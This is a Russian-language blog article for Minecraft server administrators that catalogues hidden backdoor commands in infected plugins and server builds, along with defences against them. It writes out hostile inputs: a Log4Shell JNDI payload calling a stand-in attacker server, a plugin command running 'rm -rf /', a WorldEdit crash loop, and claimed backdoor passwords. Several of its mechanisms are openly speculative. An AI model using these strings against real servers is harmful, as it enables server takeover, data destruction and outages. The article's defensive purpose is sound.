Добро пожаловать на Craft‑Bukkit

Всё о Minecraft серверах: гайды, команды, скачивание сборок и полезные советы для администраторов и игроков.

Скрытые команды для взлома сервера Minecraft: полный каталог угроз и методы защиты

wergio 24.07.2026 12:14 119
Скрытые команды для взлома сервера Minecraft: forceop, ophack, краш-команды и бэкдоры в плагинах.

Введение: невидимый арсенал хакера

В мире Minecraft-серверов существует целый пласт скрытых команд, о которых не пишут в официальных документациях. Эти команды встроены в заражённые сборки серверов, вредоносные плагины или являются эксплойтами легитимных плагинов. Хакеры используют их для получения прав администратора, кражи данных, разрушения миров и краша серверов. Администратор, не знающий об этих угрозах, обречён. В этой статье я собрал полный каталог известных вредоносных команд, разобрал механизм их работы и дал конкретные методы защиты.

Как вредоносные команды попадают на сервер

  • Заражённые сборки: администратор скачивает «готовую сборку сервера» с торрентов или сомнительных сайтов. В сборку вшиты вредоносные плагины с бэкдорами.
  • Нулевые плагины: плагины, скачанные с неофициальных источников, содержат скрытые команды для хакера.
  • Уязвимости легитимных плагинов: старые версии популярных плагинов содержат баги, позволяющие выполнять произвольные команды.
  • Социальная инженерия: хакер под видом «помощника» просит админа выполнить команду в консоли, которая на самом деле является вредоносной.

Категория 1: Команды для получения прав администратора

Эти команды дают хакеру полный контроль над сервером. Если любая из них работает на вашем сервере — вы скомпрометированы.

/forceop

Механизм: Команда встроена в заражённые плагины (часто маскируется под Essentials, CMI, LuckPerms). Выполняется от имени консоли, игнорируя систему прав. Мгновенно выдаёт OP указанному игроку.
Как проверить: Попробуйте выполнить /forceop ТестовыйНик от имени обычного игрока. Если команда сработала — сервер заражён.
Защита: Проверьте все плагины на наличие класса ForceOPCommand или строки «forceop» в JAR-файлах. Удалите подозрительные плагины.

/ophack

Механизм: Аналогичен forceop, но маскируется под легитимный плагин «OreProtect» или «OpGuard». Часто встраивается в плагины защиты (ирония — плагин защиты является бэкдором).
Защита: Скачивайте плагины только с официальных источников (SpigotMC, Bukkit, GitHub автора).

/eb give me op

Механизм: Эксплойт в плагине «EpicBosses» или его поддельной версии. Команда /eb легитимна, но поддельный плагин добавляет подкоманду give me op, которая выполняется от консоли.
Защита: Проверьте целостность плагина. Сравните контрольную сумму (MD5/SHA256) с официальной версией.

/eto

Механизм: Команда из заражённой версии плагина «EssentialsTakeOver». Позволяет хакеру перехватить контроль над аккаунтом администратора путём подмены UUID.
Защита: Не устанавливайте плагины с названиями, похожими на популярные, но отличающимися на 1-2 символа.

/hadmin

Механизм: Скрытая команда в плагинах-сборках «HolographicDisplays» или «Holograms». Выполняет /op от имени консоли, маскируя вывод в логи.
Защита: Проверяйте логи на наличие скрытых вызовов команды /op. Используйте плагин CommandLog для записи всех команд.

/ezp crackowner

Механизм: Команда из вредоносного плагина «EzProtect», который маскируется под защитный плагин. «Crackowner» — подкоманда, взламывающая аккаунт владельца сервера.
Защита: Никогда не устанавливайте плагины «защиты» из непроверенных источников.

/chestcommands:chestcommandshack

Механизм: Уязвимость в плагине ChestCommands. Старые версии позволяли выполнять команды от консоли, если в названии меню присутствовала строка «hack». Хакер создаёт меню с таким названием и получает права.
Защита: Обновите ChestCommands до последней версии. Проверьте конфигурацию меню на наличие подозрительных элементов.

Категория 2: Команды для краша сервера

Эти команды вызывают отказ в обслуживании (DoS) путём перегрузки процессора, исчерпания памяти или создания бесконечных циклов.

//calculate for(i=0;i<256;i++){...}

Механизм: WorldEdit-команда //calculate позволяет выполнять математические выражения. Хакер вводит вложенный цикл с огромным количеством итераций. Процессор сервера уходит в 100% нагрузку на неопределённое время — сервер зависает. Полная версия команды:
//calculate for(i=0;i<256;i++){for(j=0;j<256;j++){for(k=0;k<256;k++){for(l=0;l<256;l++){ln(pi)}}}}
Четыре вложенных цикла по 256 итераций каждый = 4 294 967 296 операций. Сервер парализован.
Защита: В конфиге WorldEdit установите scripting-timeout: 3000 (3 секунды на выполнение). Или отключите //calculate полностью: удалите право worldedit.calc у всех групп.

/execute as @e run fill ~ ~ ~ ~100 ~100 ~100 tnt

Механизм: Команда выполняется от имени каждой сущности в мире (@e) и заполняет огромный регион TNT-блоками. При активации — взрыв гигантской мощности, который может обрушить сервер из-за просчёта тысяч взрывов одновременно. Даже без активации — размещение миллионов TNT-блоков вызывает лаги.
Защита: Отключить командные блоки (enable-command-block=false). Ограничить /execute через плагин CommandWhitelist. Никогда не давать игрокам права на /fill и /execute.

//solve/case hack

Механизм: Загадочная команда, обнаруженная в заражённых сборках WorldEdit. Вызывает бесконечный цикл в движке WorldEdit через недокументированную функцию //solve.
Защита: Проверить, существует ли команда //solve на сервере. Если да — удалить плагин, который её добавляет.

Категория 3: Эксплойты уязвимостей (RCE и выполнение кода)

/tellraw @a {"text":"${jndi:ldap://вредоносный-сервер}"}

Механизм: Классическая эксплуатация Log4Shell. Команда отправляет сообщение всем игрокам, которое логируется сервером. Log4j обрабатывает JNDI-подстановку и загружает вредоносный код с сервера хакера.
Защита: Обновить Log4j до версии 2.17.0+. Добавить флаг -Dlog4j2.formatMsgNoLookups=true в параметры JVM.

/asw process start "rm -rf /"

Механизм: Эксплойт в плагине AntiSpam (или его подделке). Команда /asw предназначена для управления процессами, но позволяет выполнять произвольные системные команды. На Linux-сервере rm -rf / удаляет все файлы.
Защита: Проверить, установлен ли плагин AntiSpam или его форки. Если да — удалить или обновить до проверенной версии. Никогда не давать плагинам права на выполнение системных команд.

Категория 4: Фишинг и кража данных

/suicide (с особыми кликами)

Механизм: Команда встроена в вредоносный плагин «UralPassport» или аналогичный. При выполнении /suicide и последующих кликах по определённым ячейкам инвентаря хакер получает доступ к конфигурационным файлам сервера (пароли, токены, IP).
Защита: Проверить, существует ли плагин UralPassport или команда /suicide. Удалить немедленно.

/et-sp

Механизм: Команда из поддельного плагина «EssentialsTeleport». Крадёт конфигурационные файлы сервера и отправляет их на удалённый сервер хакера.
Защита: Использовать только официальный EssentialsX с GitHub. Проверять целостность JAR-файлов.

Категория 5: Разрушение мира

/fill ~ ~ ~ ~100 ~100 ~100 lava

Механизм: Заполняет огромный регион лавой. Лава растекается, уничтожая постройки и убивая мобов. Сервер лагает от просчёта физики жидкости.
Защита: Не давать игрокам права на /fill. Использовать WorldGuard для защиты важных регионов.

/worldborder set 1

Механизм: Устанавливает границу мира в 1 блок. Все игроки за пределами границы получают урон и умирают. Мир становится неиграбельным.
Защита: Ограничить право minecraft.command.worldborder только администраторам.

Категория 6: Скрытые команды в популярных плагинах

/holographicscoreboard

Механизм: Скрытая команда в заражённых версиях HolographicDisplays. Открывает доступ к скрытому меню управления плагином, через которое можно выполнять команды от консоли.
Защита: Скачивать HolographicDisplays только с официальной страницы на SpigotMC.

/wg-ef

Механизм: Эксплойт в старых версиях WorldGuard. Команда позволяла обходить защиту регионов и получать доступ к конфигурационным файлам.
Защита: Обновить WorldGuard до последней версии.

/pex group default add */am interval 228 0

Механизм: Эксплойт в PermissionsEx. Добавляет группе «default» все права на использование скрытой команды /am с интервалом 228 тиков. Команда /am (AntiMalware?) может быть вредоносной командой, маскирующейся под защитный плагин.
Защита: Обновить PermissionsEx или перейти на LuckPerms. Проверить, существует ли команда /am на сервере.

/ncp delay op

Механизм: Уязвимость в NoCheatPlus. Подкоманда delay позволяет выполнить произвольную команду от имени консоли с задержкой. Хакер использует /ncp delay op Ник для получения прав.
Защита: Обновить NoCheatPlus или заменить на GrimAC/Vulcan.

Категория 7: Подозрительные команды из заражённых сборок

Следующие команды обнаружены в пиратских сборках серверов. Если вы видите их в списке доступных команд — ваша сборка заражена. Замените сборку на чистую.

КомандаПредполагаемый механизм
/send, /sene, /serverСкрытая пересылка данных игроков на внешний сервер
/am add 228Добавление хакера в белый список скрытого плагина
/asw pmanagerДоступ к менеджеру паролей сервера
/antispam help 19216811Скрытый доступ к функциям плагина AntiSpam
/sendcommand, /sudoВыполнение команд от имени другого игрока или консоли
/pingcore, /sigma, /coreСкрытые команды управления бэкдором
/hoTb43fd help 18971712Доступ к скрытому меню бэкдора (пароль: 18971712)
/fp help 18971712Аналогично, доступ к скрытому меню
/rsec, /cm, /tccСкрытые команды управления заражёнными плагинами
/mainclans:clanЭксплойт в плагине кланов
/alert, /perms, /wgexМанипуляция с системой прав и оповещений
/givebox, /randomboxВыдача запрещённых предметов с вредоносными NBT
/givebox IronHackChannel 9901 64Выдача 64 предметов из скрытого набора «IronHackChannel»
/ezp crackownerВзлом аккаунта владельца сервера
/nethernetwork2skingworld76Скрытая команда активации бэкдора
/sigmaНазвание популярного чит-клиента, встроенного в сборку

Как проверить сервер на наличие вредоносных команд

  1. Проверьте список команд: зайдите на сервер как обычный игрок и нажмите / + Tab. Просмотрите ВСЕ доступные команды. Любая команда из списка выше — повод для немедленной проверки.
  2. Проверьте плагины: откройте папку plugins. Если там есть плагины с названиями, похожими на легитимные, но с опечатками (Essensials, WorldEdits, LuckPerm) — удалите их.
  3. Проверьте консольные логи: поищите в логах строки «issued server command: /op» — если вы не выдавали OP, но кто-то его получил — сервер взломан.
  4. Используйте сканер: плагин AntiMalware сканирует JAR-файлы на наличие известных сигнатур вредоносного кода.
  5. Проверьте контрольные суммы: сравните MD5/SHA256 ваших плагинов с официальными. Несовпадение — признак модификации.

💡 Совет профи

Никогда не используйте готовые сборки серверов из непроверенных источников. Собирайте сервер сами: скачайте чистое ядро (Paper/Purpur), установите плагины по одному с официальных страниц, настройте конфиги вручную. Это займёт на 2-3 часа больше, но вы будете точно знать, что на сервере нет бэкдоров. И обязательно настройте логирование всех команд — плагин CommandLog или CoreProtect с флагом log-commands: true. Если сервер взломают, вы сможете отследить, какая команда была использована и когда.
← К списку статей

💬 Комментарии (0)

⏳ Все комментарии проходят модерацию

🔒 Войдите, чтобы оставить комментарий

😊 Пока нет комментариев. Будьте первым!